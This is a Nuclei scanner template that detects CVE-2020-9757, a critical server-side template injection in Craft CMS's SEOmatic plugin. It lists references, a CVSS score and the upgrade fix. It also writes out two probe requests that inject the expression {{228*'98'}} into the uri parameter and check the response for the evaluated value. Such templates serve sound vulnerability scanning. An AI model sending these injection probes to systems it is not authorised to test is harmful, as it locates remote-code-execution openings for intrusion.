nuclei-templates/http/cves/2020/CVE-2020-9757.yaml

53 lines
1.8 KiB
YAML

id: CVE-2020-9757
info:
name: Craft CMS < 3.3.0 - Server-Side Template Injection
author: dwisiswant0
severity: critical
description: Craft CMS before 3.3.0 is susceptible to server-side template injection via the SEOmatic component that could lead to remote code execution via malformed data submitted to the metacontainers controller.
remediation: |
Upgrade Craft CMS to version 3.3.0 or higher to mitigate this vulnerability.
reference:
- https://github.com/nystudio107/craft-seomatic/blob/v3/CHANGELOG.md
- https://github.com/giany/CVE/blob/master/CVE-2020-9757.txt
- https://github.com/nystudio107/craft-seomatic/commit/65ab659cb6c914c7ad671af1e417c0da2431f79b
- https://github.com/nystudio107/craft-seomatic/commit/a1c2cad7e126132d2442ec8ec8e9ab43df02cc0f
- https://nvd.nist.gov/vuln/detail/CVE-2020-9757
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-9757
cwe-id: CWE-74
epss-score: 0.97031
epss-percentile: 0.99686
cpe: cpe:2.3:a:craftcms:craft_cms:*:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: craftcms
product: craft_cms
tags: cve,cve2020,ssti
http:
- method: GET
path:
- "{{BaseURL}}/actions/seomatic/meta-container/meta-link-container/?uri={{228*'98'}}"
- "{{BaseURL}}/actions/seomatic/meta-container/all-meta-containers?uri={{228*'98'}}"
skip-variables-check: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "MetaLinkContainer"
- "canonical"
- "22344"
condition: and
- type: status
status:
- 200
# digest: 4b0a00483046022100e763458169074ebfa25f98b9d76c37658ce661bce207f8f80903fc666be5e12a022100c9ed586413a7199002d7ea5265f51c6dfd7d7e39b358d807140cc1281d08ae72:922c64590222798bb761d5b6d8e72950